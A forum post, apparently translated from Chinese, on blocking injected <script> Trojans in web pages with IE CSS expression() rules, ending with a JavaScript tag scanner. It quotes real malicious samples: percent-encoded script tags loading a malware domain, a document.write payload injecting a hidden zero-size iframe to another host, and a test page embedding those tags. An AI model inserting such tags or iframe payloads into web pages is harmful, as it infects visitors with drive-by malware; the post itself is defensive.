Author: vickeychen
Source: Classic Forum
It's the web Trojan-planting ("hanging horse") problem again. During this period I have gradually felt a lot of pressure: more and more people have been adding me on QQ or MSN, and my work has been very busy recently. Ah, thinking it over, I still have to take the time to help you.
Not long ago, "A line of code to solve iframe Trojans (including server injection, client ARP injection, etc.)" was well received by many friends. It is indeed a good way to ride out the storm. But the way Trojans are planted on websites has now changed, as I expected. <script> Trojans are now popular; on the websites of a few netizens I looked at, the following had been added to the top or bottom of the page:
Note: The following addresses contain Trojans, so do not visit them casually:
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
Sweat. N identical <script> tags inserted in a row. With every patch installed on the computer, visit http://%76%63%63%64%63%2E%6E (or download it directly with Thunder). Here is what it shows:
document.write("<div style=display:none>")
document.write("<iframe src=http://a.158dm.com/b1.htm?Id=017 width=0 height=0></iframe>")
document.write("</div>")
Download ghost again with thunder. The charge is quite high!
...
var Kfqq, Qqs = "784378237"; qwfgsg = "LLLL \ XXXXXLD"; Kfqq = Qqs;
(... omitted) (N traffic-statistics JS snippets follow below).
I can't ignore the situation above. Time to think of a solution, bro. I drank a bowl of green bean porridge with a lot of sugar in it; it was good. Then I thought of the solution. The answer came from a little analysis. Let's take a look at the features of <script> Trojans:
<script src=http://%76%63%63%64%2E%63%6E></script>
The src of a script Trojan generally points to an external domain, that is, the src begins with http. A script that belongs to your own website does not need the http prefix. Next, look at what the Trojan actually does: it still writes out iframes, JS code, or other <object> code. No matter how many there are, we kill them all.
Write the CSS along with me and we will solve them one by one. I wrote five different solutions; test them yourselves:
Solution 1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/* this line of code solves the problem of planted IFRAME Trojans */
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('Trojan is isolated successfully!'):'');}
Principle: convert the src of the <script> tag to lowercase and check whether it is an external-domain JS file starting with "http". If it is, the page content is cleared and "Trojan is isolated successfully!" is written. Otherwise the page is displayed normally.
Disadvantage: the visitor cannot see the page infected with the <script> Trojan.
Solution 2:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
Principle: use document.close() to forcibly cut off document.write() from JS files in external domains. At that point the Trojan content has not finished being written; only the part already buffered is output, and the rest is never written.
Solution 3:
iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}
Principle: likewise, when an external-domain JS file is encountered, immediately call IE's private execCommand method to stop all requests on the page, so the subsequent external-domain JS files are also forced to stop downloading. It is just like clicking the "Stop" button in the browser; this appears to be a way for JS to simulate IE's Stop button.
Solution 4:
iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}
Principle: rewrite the src of the external-domain JS file to the address of IE's 404 error page. In this way, the JS code in the external domain is not downloaded.
Solution 5:
iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('Trojan is isolated successfully!'):'');}
For the fifth solution, you must add an id prefixed with "lh" to each <script> in the page's HTML source, such as lhWeatherJSapi or <script src="***/**.js" id="lhSearchJSapi"></script>
The code of the following page contains a Trojan address, repeated six times in the page. You can test it with the different solutions above to see the results of my research! (This test is dangerous. Make sure all patches are installed before testing.)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>CSS code that allows the JS Trojan process to stop quickly</title>
<style type="text/css" id="LinrStudio">
/*<![CDATA[*/
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/* For later updates on the latest Trojan-handling methods, see: http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
</head>
<body>
<script type="text/javascript" src="1.js"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
I am part 1 of the page itself
<script src=http://%76%63%63%64%2E%63%6E></script>
I am part 2 of the page itself
<script src=http://%76%63%63%64%2E%63%6E></script>
I am part 3 of the page itself
<script src=http://%76%63%63%64%2E%63%6E></script>
</body>
</html>
Here, 1.js is a file on the site itself:
document.write("I am a JS file on this site");
document.write(" ");
My test environment is:
Windows XP SP2 and Windows Vista SP1
IE6/IE7/IE8
All patches have been installed.
In summary, all the current Trojan-planting methods have been defeated, and CSS can be used to solve all of these Trojan problems, so that visitors are not so easily infected.
Please also look closely for bugs in my code. If you find any, raise them so that we can solve the problem! Or you may have another, better way to discuss.
It's very late. I'm going to bed. Study again when you are free.
Correction to Solution 5
The code for the fifth solution written above is wrong:
<script src="****/**.js" id="lhSearchJSapi"></script>
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('Trojan is isolated successfully!'):'');}
The red part is incorrect. It should be !=-1. The correct form of the above is:
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==-1)?document.write('Trojan is isolated successfully!'):'');}
script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('Trojan is isolated successfully!'):'');}
<script id="tjJSapivok" title="this is your JS code for collecting traffic from external domains" type="text/javascript" src="http://js.tongji.yahoo.com.cn/1/188/205/ystat.js"></script>
<script id="otherJSapivok" title="this is the JS file you need on this site" type="text/javascript" src="footer.js"></script>
script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('Trojan is isolated successfully!'):'');}
<script id="footerJSapivok" src="Enter the JS path of your website" type="text/javascript"></script>
<script id="tongjiJSapivok" src="JS path of the external domain" type="text/javascript"></script>
Every JS tag (<script>) on your website must be given an id attribute, and the ids must share a common prefix, suffix, or common string. The common string above is "vok".
I would like to make a correction. I would like to thank the QQ user who gave me a reminder.
The fight against webpage Trojans that harm users continues and will not stop. I also hope you will configure your servers' security better. What I offer is just a temporary fix to ride out the storm.
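The two checks used above (a src that begins with http, and the shared id string from the corrected Solution 5) can also be run over a page's HTML text outside the browser, which is useful because CSS expression() is an Internet Explorer feature. This is an added example, not code from the original post; the function names, rule names, sample markup and *.example.net hosts are assumptions made for illustration.

```javascript
// Added example, not the author's code. SAMPLE is constructed; the
// *.example.net hosts are placeholders.
const SAMPLE = [
  '<script type="text/javascript" src="footer.js" id="footerJSapivok"></script>',
  '<Script src=http://%63%64%6E.example.net/x.js></script>',
  '<script id="tongjiJSapivok" src="http://stats.example.net/s.js"></script>',
  '<iframe src=//cdn.example.net/b.htm width=0 height=0></iframe>',
].join('\n');

const TAG_RE = /<(script|iframe)\b([^>]*)>/gi;

// Read one attribute value (double-quoted, single-quoted or unquoted).
function attr(attrs, name) {
  const re = new RegExp(
    '(?:^|\\s)' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]).trim() : '';
}

// Decode a percent-encoded host so the report shows the readable address.
function decodeSrc(src) {
  try { return decodeURIComponent(src); } catch (e) { return src; }
}

// Rules, named after the article's checks:
//   external-src      src starts with http (Solutions 1-4). Protocol-relative
//                     "//host/..." is also counted; indexOf('http')==0 skips it.
//   missing-id-marker <script> whose id lacks the shared string (Solution 5).
// idMarker '' turns the marker rule off, so every external src is reported.
function findSuspectTags(html, idMarker) {
  const marker = idMarker.toLowerCase();
  const findings = [];
  for (const m of html.matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase();
    const src = attr(m[2], 'src');
    const marked = marker !== '' && attr(m[2], 'id').toLowerCase().includes(marker);
    const rules = [];
    if (/^(https?:)?\/\//i.test(src) && !marked) rules.push('external-src');
    if (tag === 'script' && marker !== '' && !marked) rules.push('missing-id-marker');
    if (rules.length > 0) findings.push({ tag, src: decodeSrc(src), rules });
  }
  return findings;
}

console.log(findSuspectTags(SAMPLE, 'vok'));
```

Run against the HTML a server actually sends (not the source template), so tags injected at the server or in transit are included in what is checked.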